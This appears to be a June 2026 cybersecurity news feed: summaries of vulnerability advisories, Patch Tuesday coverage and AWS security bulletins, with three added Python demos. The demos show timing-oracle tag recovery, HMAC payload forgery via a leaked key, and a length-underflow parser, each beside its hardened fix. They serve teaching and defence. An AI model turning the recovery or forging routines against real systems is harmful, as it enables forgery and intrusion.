This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Jun. 10, 2026 – Read the book. Cybersecurity for Accounting and Business, a new book co-authored by Nancy Bagranoff, Professor at University of Richmond, and Scott R. Boss, Associate Professor at Bentley...
https://cybersecurityventures.com/new-book-cybersecurity-for-accounting-and-business/

Microsoft's biggest-ever Patch Tuesday fixes 206 bugs, including 3 zero-days
June 2026 is the largest Patch Tuesday in history, fixing 206 vulnerabilities and three publicly disclosed zero-days.
https://www.malwarebytes.com/blog/bugs/2026/06/microsofts-biggest-ever-patch-tuesday-fixes-206-bugs-including-3-zero-days

From SBOMs to AI BOMs: Why SPDX 3.0 Matters
Software bill of materials (SBOM) strategies are rapidly evolving. What began as a way to track open source components for compliance and vulnerability management is quickly expanding into something much larger: a broader effort to understand, secure, and govern modern software supply chains.
https://www.sonatype.com/blog/from-sboms-to-ai-boms-why-spdx-3.0-matters

88% of people struggle to tell what’s real online
As AI-generated scams, deepfakes, and impersonation spread, a new Malwarebytes report finds people increasingly unsure what to trust online.
https://www.malwarebytes.com/blog/ai/2026/06/88-of-people-struggle-to-tell-whats-real-online

CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry
Overview. On June 9, 2026, Ivanti published a security advisory for two critical vulnerabilities affecting Ivanti Sentry (formerly known as MobileIron Sentry), which per the vendor website is an “in-line gateway that manages, encrypts, and secures traffic between the mobile device and back-end enterprise systems”. The most severe issue, CVE-2026-10520, is an OS command injection vulnerability with a CVSS score of 10.0 that allows a remote unauthenticated attacker to achieve remote code execution (RCE) with root privileges. The second vulnerability, CVE-2026-10523, is an authentication bypass vulnerability with a CVSS score of 9.9 that allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access. Ivanti has stated that they are...
https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry

Unpacking SMB cyber-readiness – and what makes or breaks it
A company that's expecting a cyberattack but hasn't actively prepared for it risks making the hardest decisions at the worst possible moment.
https://www.welivesecurity.com/en/business-security/smb-cyber-readiness-what-makes-breaks-it/

A Record-Breaking Patch Tuesday for June 2026
Microsoft today released software updates to plug nearly 200 security holes across its Windows operating systems and supported software, a record number of fixes for the company's monthly Patch Tuesday cycle. Nearly three dozen of those bugs earned Microsoft's most dire "critical" rating, and exploit code for at least three of the weaknesses is now publicly available.
https://krebsonsecurity.com/2026/06/a-record-breaking-patch-tuesday-for-june-2026/

Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility
Unit 42 research examines attack scenarios targeting cloud logging services. Learn how to defend against log manipulation and defense evasion.
https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/

Patch Tuesday - June 2026
Microsoft is publishing 200 vulnerabilities on June 2026 Patch Tuesday. Microsoft is not aware of exploitation in the wild for any of these vulnerabilities, and is aware of public disclosure for three. This is similar to last month's Patch Tuesday, however several of last month's vulnerabilities ended up on CISA KEV in the days following their publication. So far this month, Microsoft has provided patches to address 360 browser vulnerabilities, which is an order of magnitude more than has been typical in any given month over the past few years. As usual, browser vulns are not included in the Patch Tuesday count above. Indeed, the vast, and presumably sustained, uptick in the number of browser vulnerabilities has led to Microsoft no longer enumerating Chromium CVEs in the Security Update...
https://www.rapid7.com/blog/post/em-patch-tuesday-june-2026

Reconstructing AI activity in investigations
Learn how to investigate AI activity in Microsoft 365 Copilot and Azure AI services using a structured, telemetry-driven approach. This playbook helps security teams reconstruct events, assess data exposure, and detect potential threats faster.
https://www.microsoft.com/en-us/security/blog/2026/06/09/reconstructing-ai-activity-investigations/

Suspected North Korean actors use fake ‘coding assignments’ to steal crypto

https://www.proofpoint.com/us/newsroom/news/suspected-north-korean-actors-use-fake-coding-assignments-steal-crypto

Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257
We include indicators of activity and mitigations for PAN-OS vulnerability CVE-2026-0257.
https://unit42.paloaltonetworks.com/active-exploitation-of-pan-os-cve-2026-0257/

Meta’s face-recognition code raises new concerns about smart glasses
As smart glasses become more capable, concerns about face recognition, covert recording, and biometric surveillance are growing.
https://www.malwarebytes.com/blog/privacy/2026/06/metas-face-recognition-code-raises-new-concerns-about-smart-glasses

Rapid7 Gains Access To Anthropic's Project Glasswing To Explore Frontier AI For Cybersecurity
Wade Woolwine is Senior Director, Product Security at Rapid7. Rapid7 is excited to join Anthropic's Project Glasswing, which includes access to Claude Mythos Preview, giving our teams the opportunity to explore how frontier AI can support legitimate, internal defensive security workflows led by experienced security practitioners. Anthropic has now expanded Project Glasswing from its initial cohort to a broader group of organizations, underscoring how quickly this conversation is moving from model capability to industry readiness. This access comes at a critical moment for security operations. Attackers are moving faster, attack surfaces are expanding, and fragmented security data makes it harder for teams to correlate context and respond at scale. The industry is entering a period where...
https://www.rapid7.com/blog/post/ai-rapid7-accesses-anthropics-project-glasswing-exploring-frontier-artificial-cybersecurity-intelligence

2026 CISO Compensation Data: Salaries, Bonuses, Equity
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Jun. 9, 2026 – Read the report. The 2026 CISO Report from Cybersecurity Ventures in partnership with Sophos examines the latest compensation data for CISOs. According to Glassdoor data, the median annual pay range […]
https://cybersecurityventures.com/2026-ciso-compensation-data-salaries-bonuses-equity/

Is Offensive Security Keeping Up with the Latest Cyber Attacks?
Security is not a point-in-time exercise. It's a cycle of testing, fixing, and starting over. Organisations that treat it as anything less quickly fall behind. In the last decade, we've seen how offensive security practices such as penetration testing, combined with follow-up patching and mitigation strategies, have significantly strengthened defences. For instance, Active Directory hardening, […]
https://www.itsecurityguru.org/2026/06/09/is-offensive-security-keeping-up-with-the-latest-cyber-attacks/?utm_source=rss&utm_medium=rss&utm_campaign=is-offensive-security-keeping-up-with-the-latest-cyber-attacks

Filigran uses AI agents to make CTEM practical for overstretched security teams
Filigran has unveiled XTM One, an AI-native orchestration layer designed to automate Continuous Threat Exposure Management (CTEM) workflows, as organisations struggle to keep pace with growing volumes of threat intelligence, vulnerabilities and attack data. The launch reflects a broader challenge facing security teams. While many organisations have invested heavily in threat intelligence, attack surface management […]
https://www.itsecurityguru.org/2026/06/09/filigran-uses-ai-agents-to-make-ctem-practical-for-overstretched-security-teams/?utm_source=rss&utm_medium=rss&utm_campaign=filigran-uses-ai-agents-to-make-ctem-practical-for-overstretched-security-teams

16-31 May 2026 Cyber Attacks Timeline
The threat landscape in the second half of May 2026 was driven by cybercrime and dominated by malware. Exploitation of vulnerabilities in public-facing applications continued to play an important role, as did supply chain attacks.
https://www.hackmageddon.com/2026/06/09/16-31-may-2026-cyber-attacks-timeline/

Cybercriminals: the 'auditors' you never hired
Every organisation gets audited. The question is who does the auditing.
https://www.welivesecurity.com/en/business-security/cybercriminals-auditors-never-hired/

Entra Agent ID from a Security Perspective
AI agents in your Entra ID tenant? They come with new identities, permissions, and fresh attack paths. Christian Feuchter breaks down Entra Agent ID security, security-relevant capabilities, control paths, abuse scenarios, and how to review your exposure with EntraFalcon.
https://blog.compass-security.com/2026/06/entra-agent-id-from-a-security-perspective/

Improper access control in API endpoints
CVSSv3 score: 6.2. An improper access control vulnerability [CWE-284] in FortiPortal API endpoints may allow a remote privileged attacker with the organization user role to obtain sensitive network configuration data via crafted HTTP requests. Revised on 2026-06-09.
https://fortiguard.fortinet.com/psirt/FG-IR-26-140

Restricted CLI escape using Lua
CVSSv3 score: 6.0. An "Internal Asset Exposed to Unsafe Debug Access Level or State" vulnerability [CWE-1244] in FortiOS and FortiProxy may allow an authenticated admin to execute Lua scripts via crafted CLI commands. Revised on 2026-06-09.
https://fortiguard.fortinet.com/psirt/FG-IR-26-143

Second-Order OS Command Injection via JSON Input on start vnc feature
CVSSv3 score: 9.1. An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in the FortiSandbox, FortiSandbox Cloud and FortiSandbox PaaS web UI may allow an unauthenticated attacker to execute unauthorized commands via specifically crafted HTTP requests. Revised on 2026-06-09.
https://fortiguard.fortinet.com/psirt/FG-IR-26-141

Windows Netlogon Remote Code Execution Vulnerability
What is the Vulnerability? A critical vulnerability, CVE-2026-41089, affecting the Windows Netlogon service is now being actively exploited in the wild. The vulnerability was patched by Microsoft during the May 2026 Patch Tuesday release and was recently highlighted by the Centre for Cybersecurity Belgium (CCB) after observing active exploitation attempts targeting unpatched systems. Netlogon is a core Windows service responsible for authentication and secure communication between domain controllers and domain-joined systems. The vulnerability stems from a stack-based buffer overflow within the Netlogon Remote Procedure Call (RPC) interface and allows an unauthenticated attacker to achieve remote code execution against a...
https://fortiguard.fortinet.com/threat-signal-report/6455

AI Has Turned Cloud Risk Into a Race and Human Defenders are Losing
Originally published by Skyhawk Security. Cloud security used to be framed as a posture problem: find the critical vulnerabilities, fix the most severe misconfigurations, and reduce the visible attack surface. That model is no longer enough. The defining change is not that artificial intelligence has created a completely new class of attacks. The change is that AI helps attackers move faster, connect more weak posture findings, and operationalize attack pa...
https://cloudsecurityalliance.org/articles/ai-has-turned-cloud-risk-into-a-race-and-human-defenders-are-losing

Cisco Catalyst SD-WAN Manager Privilege Escalation Vulnerability
What is the Vulnerability? Cisco has disclosed a critical security vulnerability, CVE-2026-20245, affecting Cisco Catalyst SD-WAN Manager and confirmed that it is being actively exploited in the wild. The vulnerability resides in the platform's command-line interface (CLI) and allows an authenticated attacker with netadmin privileges to execute arbitrary commands as root on the underlying operating system. According to Cisco, successful exploitation has been observed in real-world attacks and has resulted in unauthorized configuration changes being pushed to managed SD-WAN edge devices. At the time of disclosure, Cisco had not released a software fix or workaround and instead provided indicators of compromise and investigation...
https://fortiguard.fortinet.com/threat-signal-report/6456

When “Hi, This Is IT” Comes Through Microsoft Teams
Attackers are increasingly targeting collaboration platforms like Microsoft Teams. Learn the risks and key steps to strengthen your organization's security.
https://unit42.paloaltonetworks.com/microsoft-teams-phishing/

Financial Services Industry Shifts from AI Adoption to Governance as Autonomous Systems Proliferate, Cloud Security Alliance Survey Finds
As AI systems gain ground in the financial sector, limited visibility raises flags about governance and risk management. SEATTLE – June 9, 2026 — A new survey from the Cloud Security Alliance (CSA), the world's leading not-for-profit organization committed to AI, cloud, and Zero Trust cybersecurity education, found that the financial services sector has moved beyond debating whether to adopt Artificial Intelligence (AI), and is now grappling with how to govern it effectively before autonomy ...
https://cloudsecurityalliance.org/articles/financial-services-industry-shifts-from-ai-adoption-to-governance-as-autonomous-systems-proliferate-cloud-security-alliance-survey-finds

Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)
Overview: On June 8, 2026, Check Point published a security advisory for CVE-2026-50751, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN, Mobile Access, and Spark Firewall products. The vulnerability affects deployments configured to use the deprecated IKEv1 key exchange protocol where gateways accept legacy Remote Access clients and do not require a machine certificate for connections. CVE-2026-50751, classified as improper authentication (CWE-287), has a CVSS score of 9.3. The vulnerability stems from a logic flow weakness in how Remote Access and Mobile Access components validate certificates during IKEv1 key exchange; successful exploitation allows an unauthenticated attacker to establish a VPN session without providing valid credentials. Per the vendor,...
https://www.rapid7.com/blog/post/etr-critical-check-point-vpn-zero-day-exploited-in-the-wild-cve-2026-50751

AI brands as bait: How threat actors are using the AI hype in social engineering
As threat actors operationalize AI to accelerate attacks, they are also leveraging the wider global interest around AI itself as a social engineering lure.
https://www.microsoft.com/en-us/security/blog/2026/06/08/ai-brands-as-bait-how-threat-actors-are-using-the-ai-hype-in-social-engineering/

May 2026 Dark Web Breach Incident Trend Report
Notes: The May 2026 Dark Web Breach Incident Trend Report is organized around the major cases of data breaches posted on deep web and dark web forums. Due to the nature of the source, some of the information may not be fully verifiable as to whether it is true or not, and is therefore […]
https://asec.ahnlab.com/en/94028/

Dark Web Threat Actor Trend Report May 2026
Notes: The May 2026 Dark Web Threat Actor Trend Report summarizes the trends of threat actors and hacktivists operating on the deep web and dark web. Some statements are not factually verifiable. Major issues: Hacktivist activity targeting the South Korean region was concentrated. Some hacktivist groups claimed DDoS attacks against the website of the South […]
https://asec.ahnlab.com/en/94033/

May 2026 Dark Web Issue Trend Report
Notes: The May 2026 Dark Web Issue Trend Report summarizes the major issues that occurred on the deep web and dark web. Due to the nature of the sources, some of the information cannot be fully verified for factual accuracy. Major issues: Hasan's BreachForums experienced a moderator split, with HasanBroker being ousted […]
https://asec.ahnlab.com/en/94034/

Mythos Found 10,000 Vulnerabilities. The Bigger Challenge Is Fixing Them
You don't need an AI-scale fortune to be Mythos ready. You need automated, policy-driven remediation that can close the gap between vulnerability discovery and verified fixes. Keep reading for a practical 30-60-90 day playbook to get there.
https://www.sonatype.com/blog/mythos-found-10000-vulnerabilities.-the-bigger-challenge-is-fixing-them

WireBadger Malicious Cable Detector For Penetration Testers And Red Teams
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Jun. 8, 2026 – WireBadger production information – USB technology was designed for convenience and universal compatibility. When a cable or device connects, computers and mobile devices automatically trust and communicate with it […]
https://cybersecurityventures.com/wirebadger-malicious-cable-detector-for-penetration-testers-and-red-teams/

Baker Distributing - 102,935 breached accounts
In May 2026, the HVAC/R wholesale distributor Baker Distributing Company was added to the ShinyHunters data extortion group's "pay or leak" site. In early June, the group publicly published data they claimed had been obtained from Baker's SharePoint and Salesforce infrastructure including 103k unique email addresses along with names, physical addresses, phone numbers and tickets relating to the company's HVAC contractor customer base. The exposed data was largely corporate contact and support information with limited sensitivity.
https://haveibeenpwned.com/Breach/BakerDistributing

AI-Powered Penetration Testing with Metasploit
Overview: This article documents an end-to-end agentic penetration test. Claude Desktop, connected to the Metasploit Framework through the Model Context Protocol (MCP), turns plain-English tasks […]
https://www.hackingarticles.in/ai-powered-penetration-testing-with-metasploit/

Ongoing updates on Copy.fail and variants
Bulletin ID: 2026-030-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 05/13/2026 10:00 PM PDT This is an ongoing issue. This bulletin will be updated as more information becomes available. Description: AWS is aware of the copy.fail or DirtyFrag class of issues - a set of privilege escalation issues affecting the Linux Kernel. We will update this bulletin as more information becomes available. Please see below for current patching timelines for affected services related to the Copy.fail kernel issue and all its variants. AWS recommends that customers apply all updates addressing these issues as soon as they are available. See more details at Security Bulletin (ID: 2026-030-AWS).
https://aws.amazon.com/security/security-bulletins/rss/2026-030-aws/

Issue with AWS-LC: an open-source, general-purpose cryptographic library (CVE-2026-3336, CVE-2026-3337, CVE-2026-3338)
Bulletin ID: 2026-005-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/03/02 14:30 PST Description: AWS-LC is an open-source, general-purpose cryptographic library. We identified three distinct issues: - CVE-2026-3336: PKCS7_verify certificate chain validation bypass in AWS-LC. Improper certificate validation in PKCS7_verify() in AWS-LC allows an unauthenticated user to bypass certificate chain verification for every signer except the final one when processing PKCS7 objects with multiple signers. - CVE-2026-3337: Timing side-channel in AES-CCM tag verification in AWS-LC. An observable timing discrepancy in AES-CCM decryption in AWS-LC allows an unauthenticated user to potentially determine authentication tag validity via timing analysis. - CVE-2026-3338: PKCS7_verify...
https://aws.amazon.com/security/security-bulletins/rss/2026-005-aws/
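
A constant-time comparison is the usual fix for the tag-verification side channel described under CVE-2026-3337. The added example below is illustrative code written for this page, not AWS-LC code: it replaces the timing measurement with a deterministic count of bytes examined, shows what an early-exit comparison leaks, and runs the byte-at-a-time recovery an attacker builds on that leak; `hmac.compare_digest` is the constant-time comparison in the hardened version. The key, the 16-byte tag length and the ciphertext are constructed values.

```python
import hashlib
import hmac

# Constructed demo values. In a real AES-CCM decrypt the tag comes from the cipher;
# here it is an HMAC truncated to 16 bytes so the example is deterministic and runs offline.
DEMO_KEY = b"demo-key-not-a-real-secret"
TAG_LEN = 16


def expected_tag(ciphertext: bytes) -> bytes:
    """Stand-in for the receiver's recomputation of the authentication tag."""
    return hmac.new(DEMO_KEY, ciphertext, hashlib.sha256).digest()[:TAG_LEN]


def leaky_verify(ciphertext: bytes, tag: bytes) -> tuple[bool, int]:
    """Variable-time check that stops at the first mismatching byte.

    Returns (is_valid, bytes_examined). bytes_examined is a deterministic proxy for
    the elapsed time an attacker would measure over the network.
    """
    expected = expected_tag(ciphertext)
    if len(tag) != len(expected):
        return False, 0
    examined = 0
    for a, b in zip(expected, tag):
        examined += 1
        if a != b:
            return False, examined  # early exit reveals the length of the matching prefix
    return True, examined


def constant_time_verify(ciphertext: bytes, tag: bytes) -> bool:
    """Hardened check: compare_digest takes the same time wherever the bytes differ."""
    return hmac.compare_digest(expected_tag(ciphertext), tag)


def recover_tag(ciphertext: bytes, oracle) -> bytes:
    """Byte-at-a-time recovery that uses only the oracle's (valid, time) answers.

    At position i the correct byte is the only candidate whose comparison proceeds
    past position i, so it is the candidate with the largest "time".
    """
    guess = bytearray(TAG_LEN)
    for i in range(TAG_LEN):
        best_byte, best_time = 0, -1
        for candidate in range(256):
            guess[i] = candidate
            valid, elapsed = oracle(ciphertext, bytes(guess))
            if valid:
                return bytes(guess)
            if elapsed > best_time:
                best_byte, best_time = candidate, elapsed
        guess[i] = best_byte
    return bytes(guess)


def constant_time_oracle(ciphertext: bytes, tag: bytes) -> tuple[bool, int]:
    """What the attacker sees against the hardened check: a validity bit and a flat timing."""
    return constant_time_verify(ciphertext, tag), TAG_LEN


if __name__ == "__main__":
    ct = b"constructed ciphertext bytes"
    real = expected_tag(ct)
    print("leaky oracle recovers tag:", recover_tag(ct, leaky_verify) == real)
    print("constant-time oracle recovers tag:", recover_tag(ct, constant_time_oracle) == real)
```

Against the leaky oracle the full 16-byte tag is recovered in at most 16 × 256 queries; against the constant-time oracle the same loop has nothing to rank candidates by and the guess never advances beyond zeros.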

Issues with AWS Research and Engineering Studio (RES)
Bulletin ID: 2026-014-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/06 14:00 PDT Description: Research and Engineering Studio (RES) on AWS is an open-source web portal designed for administrators to create and manage secure cloud-based research and engineering environments. We have identified the following issues with AWS Research and Engineering Studio (RES). CVE-2026-5707: Unsanitized input in an OS command in the virtual desktop session name handling in AWS Research and Engineering Studio (RES) versions 2025.03 through 2025.12.01 might allow a remote authenticated actor to execute arbitrary commands as root on the virtual desktop host via a crafted session name. CVE-2026-5708: Improper control of user-modifiable attributes in the session...
https://aws.amazon.com/security/security-bulletins/rss/2026-014-aws/

Issue with FreeRTOS-Plus-TCP - MAC Address Validation Bypass and ICMP Echo Reply Integer Underflow
Bulletin ID: 2026-021-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/29 12:00 PM PDT Description: FreeRTOS-Plus-TCP is a scalable, open source, and thread-safe TCP/IP stack for FreeRTOS. - CVE-2026-7422: Insufficient packet validation in the IPv4 and IPv6 receive paths allows an adjacent network device to send a packet that bypasses checksum and minimum-size validation by spoofing the Ethernet source MAC address to match one of the target device's own registered endpoints. - CVE-2026-7423: Integer underflow in the ICMP and ICMPv6 echo reply handlers allows an adjacent network device to cause a denial of service (device crash) when outgoing ping support is enabled, because header sizes are subtracted from a packet length field without validating the...
https://aws.amazon.com/security/security-bulletins/rss/2026-021-aws/

Security Findings in SageMaker Python SDK
Bulletin ID: 2026-004-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/02/02 14:30 PST Description: CVE-2026-1777 - Exposed HMAC in SageMaker Python SDK. The SageMaker Python SDK's remote functions feature uses a per-job HMAC key to protect the integrity of serialized functions, arguments, and results stored in S3. We identified an issue where the HMAC secret key is stored in environment variables and disclosed via the DescribeTrainingJob API. This allows third parties with DescribeTrainingJob permissions to extract the key, forge cloud-pickled payloads with valid HMACs, and overwrite S3 objects. CVE-2026-1778 - Insecure TLS configuration in SageMaker Python SDK. The SageMaker Python SDK is an open source library for training and deploying machine learning...
https://aws.amazon.com/security/security-bulletins/rss/2026-004-aws/
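
The failure in CVE-2026-1777 is one of key placement, not of HMAC itself: the integrity check is sound as long as only the job owner can compute tags, and it collapses as soon as a describe-style API hands the key to anyone with read permission. The added example below is illustrative code written for this page, not SageMaker SDK code. It models the two designs with a constructed `describe_job` stand-in and a JSON payload; the real SDK serializes with cloudpickle, which executes code when loaded, so a forged-but-valid payload there means code execution in the job rather than a changed JSON field. The names `JOB_HMAC_KEY`, `JOB_HMAC_KEY_REF` and `describe_job` are hypothetical.

```python
import hashlib
import hmac
import json
import os


def new_job_key() -> bytes:
    """Per-job integrity key, generated when the job is created."""
    return os.urandom(32)


def sign_payload(key: bytes, payload: dict) -> tuple[bytes, str]:
    """Serialize and tag a payload. JSON stands in for cloudpickle so the demo is safe to run."""
    blob = json.dumps(payload, sort_keys=True).encode()
    return blob, hmac.new(key, blob, hashlib.sha256).hexdigest()


def verify_payload(key: bytes, blob: bytes, tag: str) -> bool:
    """Worker-side check that must pass before anything pulled from storage is deserialized."""
    return hmac.compare_digest(hmac.new(key, blob, hashlib.sha256).hexdigest(), tag)


def launch_job_key_in_env(key: bytes) -> dict:
    """Vulnerable pattern: the key travels as a container environment variable, and the
    job record (what a describe call returns) carries the whole environment."""
    return {"JobName": "demo-job", "Environment": {"JOB_HMAC_KEY": key.hex()}}


def launch_job_key_out_of_band(key: bytes) -> dict:
    """Hardened pattern: the record carries only a reference; the key itself lives
    somewhere a describe permission does not reach (a secrets store, a scoped KMS key)."""
    return {"JobName": "demo-job", "Environment": {"JOB_HMAC_KEY_REF": "secret://demo-job/hmac"}}


def describe_job(job_record: dict) -> dict:
    """Constructed stand-in for an API that returns job metadata to any caller with describe rights."""
    return json.loads(json.dumps(job_record))


def attacker_forges(job_record: dict, worker_key: bytes) -> bool:
    """The attacker holds describe permission only. Returns True when a payload they sign
    is accepted by a worker that verifies with the real per-job key."""
    env = describe_job(job_record)["Environment"]
    leaked_hex = env.get("JOB_HMAC_KEY")
    # With no key in the metadata the attacker can only sign under a guess.
    forging_key = bytes.fromhex(leaked_hex) if leaked_hex is not None else os.urandom(32)
    blob, tag = sign_payload(forging_key, {"function": "run", "args": ["attacker-controlled"]})
    return verify_payload(worker_key, blob, tag)


def demo() -> tuple[bool, bool]:
    """(forgery accepted with the key in the job environment, forgery accepted with it out of band)."""
    key = new_job_key()
    return (attacker_forges(launch_job_key_in_env(key), key),
            attacker_forges(launch_job_key_out_of_band(key), key))


if __name__ == "__main__":
    print("forgery accepted (key in env, key out of band):", demo())
```

The check that matters when reviewing a design like this is whether any API reachable with a read-only permission returns the environment verbatim; if it does, the environment is not a place for signing keys.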

Issue with Amazon SageMaker Python SDK - Model artifact integrity verification issues (CVE-2026-8596 & CVE-2026-8597)
Bulletin ID: 2026-031-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 05/14/2026 13:00 PDT Description: Amazon SageMaker Python SDK is an open-source library for training and deploying machine learning models on Amazon SageMaker. The ModelBuilder component simplifies model deployment by automating model artifact preparation and SageMaker model creation. We identified two issues affecting the model artifact integrity verification mechanism in the ModelBuilder/Serve component: - CVE-2026-8596: We identified a cleartext storage of sensitive information issue in the ModelBuilder/Serve component. When building models using ModelBuilder, the SDK stored an HMAC signing key as a container environment variable (SAGEMAKER_SERVE_SECRET_KEY). This key was returned in...
https://aws.amazon.com/security/security-bulletins/rss/2026-031-aws/

CVE-2026-7424 - Integer Underflow in DHCPv6 Sub-Option Parser in FreeRTOS-Plus-TCP
Bulletin ID: 2026-022-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/29 12:20 PM PDT Description: FreeRTOS-Plus-TCP is an open-source, scalable TCP/IP stack for FreeRTOS. We identified CVE-2026-7424, where an integer underflow issue in the DHCPv6 sub-option parser could allow an adjacent network user to corrupt the device's IPv6 address assignment, DNS configuration, and lease times, and to cause a denial of service (IP task freeze requiring hardware reset). Impacted versions: FreeRTOS-Plus-TCP >= V4.0.0 and <= V4.2.5, and >= V4.3.0 and <= V4.4.0. Please refer to the article below for the most up-to-date and complete information related to this AWS Security Bulletin.
https://aws.amazon.com/security/security-bulletins/rss/2026-022-aws/
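
CVE-2026-7423 (ICMP echo reply) and CVE-2026-7424 (DHCPv6 sub-options) share one arithmetic pattern: a header or option length is subtracted from a length field the peer controls, and because the field is unsigned the result wraps to a large value instead of going negative. The added example below is illustrative code written for this page, not FreeRTOS-Plus-TCP code. It emulates 16-bit unsigned arithmetic in Python and runs a generic type-length-value option parser, of the kind used for DHCPv6 sub-options, in its unchecked and checked forms over one constructed well-formed buffer and one constructed malformed one. The 2-byte code, 2-byte length layout is an assumption made for the illustration.

```python
U16_MASK = 0xFFFF
OPTION_HEADER = 4  # assumed layout for the demo: 2-byte code, 2-byte length, then the value


def u16(x: int) -> int:
    """Emulate C uint16_t: results wrap modulo 2**16 instead of going negative."""
    return x & U16_MASK


def be16(buf: bytes, off: int) -> int:
    # In C this would read two bytes wherever 'off' points; Python slicing just returns b"" past the end.
    return int.from_bytes(buf[off:off + 2], "big")


def parse_options_unchecked(buf: bytes, max_iter: int = 8) -> tuple[list, int]:
    """Vulnerable pattern: subtracts header+length from 'remaining' without checking that it fits.

    Returns (options, remaining). max_iter exists only so the demo terminates; the C loop
    would keep walking memory past the packet until something crashes or the task hangs.
    """
    options, off, remaining = [], 0, u16(len(buf))
    for _ in range(max_iter):
        if remaining == 0:
            break
        code, length = be16(buf, off), be16(buf, off + 2)
        options.append((code, buf[off + OPTION_HEADER:off + OPTION_HEADER + length]))
        off += OPTION_HEADER + length
        remaining = u16(remaining - OPTION_HEADER - length)  # wraps when length > remaining - 4
    return options, remaining


def parse_options_checked(buf: bytes) -> list:
    """Hardened: reject any option whose declared length does not fit in what is left."""
    options, off, remaining = [], 0, len(buf)
    while remaining > 0:
        if remaining < OPTION_HEADER:
            raise ValueError("truncated option header")
        code, length = be16(buf, off), be16(buf, off + 2)
        if OPTION_HEADER + length > remaining:
            raise ValueError(f"option {code} declares {length} bytes but only {remaining - OPTION_HEADER} remain")
        options.append((code, buf[off + OPTION_HEADER:off + OPTION_HEADER + length]))
        off += OPTION_HEADER + length
        remaining -= OPTION_HEADER + length
    return options


def checked_rejects(buf: bytes) -> bool:
    try:
        parse_options_checked(buf)
    except ValueError:
        return True
    return False


def option(code: int, value: bytes) -> bytes:
    return code.to_bytes(2, "big") + len(value).to_bytes(2, "big") + value


# Constructed inputs: a well-formed pair of options, and a header that claims 32 bytes with only 2 present.
GOOD = option(5, b"\x20\x01" + bytes(14)) + option(23, b"\x00\x00\x0e\x10")
BAD = (5).to_bytes(2, "big") + (32).to_bytes(2, "big") + b"\xaa\xbb"

if __name__ == "__main__":
    print("unchecked, good:", parse_options_unchecked(GOOD))
    print("unchecked, bad (note 'remaining'):", parse_options_unchecked(BAD))
    print("checked rejects bad:", checked_rejects(BAD))
```

On the malformed buffer the unchecked parser ends with a `remaining` count far larger than the packet and keeps emitting phantom options from beyond it, which is the "corrupted assignment" and "task freeze" pair the bulletin describes; the checked parser refuses at the first option that does not fit.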

Issues with Amazon Athena ODBC Driver
Bulletin ID: 2026-013-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/03 13:00 PDT Description: The Amazon Athena ODBC driver implements standard ODBC application program interfaces (APIs). The ODBC driver provides access to Amazon Athena from any C/C++ application. The Amazon Athena ODBC driver provides 64-bit ODBC drivers for Windows, Linux and macOS. We identified the following: - CVE-2026-5485: OS command injection in browser-based authentication component (Linux only, fixed in 2.0.5.1) - CVE-2026-35558: Improper neutralization of special elements in authentication components - CVE-2026-35559: Out-of-bounds write in query processing components - CVE-2026-35560: Improper certificate validation in identity provider connection components...
https://aws.amazon.com/security/security-bulletins/rss/2026-013-aws/

CVE-2026-11400 and CVE-2026-11401
Bulletin ID: 2026-039-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 06/025/2026 12:15 PM PDT Description: Amazon Aurora PostgreSQL is a fully managed relational database engine that's compatible with PostgreSQL. We identified CVE-2026-11400 (JDBC) and CVE-2026-11401 (Go), an issue in the AWS wrappers for Amazon Aurora PostgreSQL that allows privilege escalation to the rds_superuser role. A low-privilege authenticated user can create a crafted function that could be executed with the permissions of other Amazon Relational Database Service (RDS) users. Impacted versions: - AWS Advanced JDBC Wrapper >=3.0.0 and < 4.0.1 - AWS Advanced Go Wrapper release 2026-04-06 Please refer to the article below for the most up-to-date and complete information related to this AWS...
https://aws.amazon.com/security/security-bulletins/rss/2026-039-aws/

Fragnesia Local Privilege Escalation report via ESP-in-TCP in the Linux Kernel
Bulletin ID: 2026-029-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 05/13/2026 18:45 PDT This is an ongoing issue. Information is subject to change. Please refer to our Security Bulletin (ID: 2026-030-AWS) for the most updated patching information. Description: Amazon is aware of CVE-2026-46300, a report of an additional privilege escalation issue in the Linux kernel related to the DirtyFrag, copy.fail class of issues (CVE-2026-43284). The proof of concept uses a vector via the loadable module espintcp. Amazon Linux does not provide this module, and is not affected. As defense in depth we will include a correctness patch to the core networking code to harden against possible similar issues in network protocol implementations that rely on this behavior....
https://aws.amazon.com/security/security-bulletins/rss/2026-029-aws/

CVE-2026-6437 - Mount Option Injection in Amazon EFS CSI Driver
Bulletin ID: 2026-016-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/04/17 11:15 AM PDT Description: The Amazon EFS CSI Driver is a Container Storage Interface driver that allows Kubernetes clusters to use Amazon Elastic File System. We identified CVE-2026-6437, where an actor with PersistentVolume creation privileges can inject arbitrary mount options via two unsanitized fields: the Access Point ID in volumeHandle and the mounttargetip volumeAttribute. In both cases, appending comma-separated values causes the mount utility to parse them as separate mount options. No AWS service is affected. Impacted versions: EFS CSI Driver <= v3.0.0 Please refer to the article below for the most up-to-date and complete information related to this AWS...
https://aws.amazon.com/security/security-bulletins/rss/2026-016-aws/
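
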